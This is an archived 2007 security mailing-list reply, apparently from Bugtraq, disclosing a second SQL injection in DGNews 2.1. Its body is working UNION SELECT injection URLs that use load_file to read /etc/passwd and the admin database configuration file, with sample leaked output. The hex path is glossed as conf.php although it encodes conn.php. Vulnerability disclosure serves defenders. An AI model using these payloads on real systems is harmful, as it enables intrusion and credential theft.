Re: DGNews version 2.1 SQL Injection Vulnerability

From: laurent.gaffie@xxxxxxxxx
Date: 29 May 2007 06:43:19 -0000

hi there

there's also another sql injection on this script:
news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*
//result: "This news has 1 comments. Please read, or post one by click here.
* 5 (by: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:..................."

read the database credentials plain text :
news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*
//information is in the source code.
* 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870 = /usr/local/apache2/htdocs/dgnews/admin/conf.php

ps: works regardless of php.ini settings .

regards laurent gaffie

Prev by Date: DGNews version 2.1 XSS Attack Vulnerability
Next by Date: Mac OS X vpnd local format string
Previous by thread: DGNews version 2.1 SQL Injection Vulnerability
Next by thread: myEvent version 1.6 Multiple Path Disclosure Vulnerabilities
Index(es):
- Date
- Thread

Relevant Pages

cpcommerce < v1.1.0 [sql injection]
... risk: high ... note:works regardless of php.ini settings. ... read database credentials plain text: ...
(Bugtraq)
Re: Dynamically Setting Wireless Settings
... the preferred network only settings isn't something I've ever tried to ... for the Windows Zero Config API, ... except by the source code. ...
(microsoft.public.dotnet.framework.compactframework)
Re: WMP10 -- Sync always at 160kbps, regardless of settings
... my audio device ... files, regardless of the current bitrate settings; ... Still haven't had any luck with the SD Card synching at 160kpbs problem, ... want to look at WMP user settings when converting and synching. ...
(microsoft.public.windowsmedia.player)
Re: RunKeyValues code (Re: Mitch G I guess you are over here now
... to settings that may have ... > You can view the Java source code at: ... > - Michel Gallant ... > MVP Security ...
(microsoft.public.security)
Re: Exception Handling - help!
... > Send me a link to your manifesto; ... have to check the source code to try to distinguish between an OS behavior ... important that the .net behavior be logically consistent and that it does ... the "right thing" regardless of the underlying OS. ...
(microsoft.public.dotnet.framework.clr)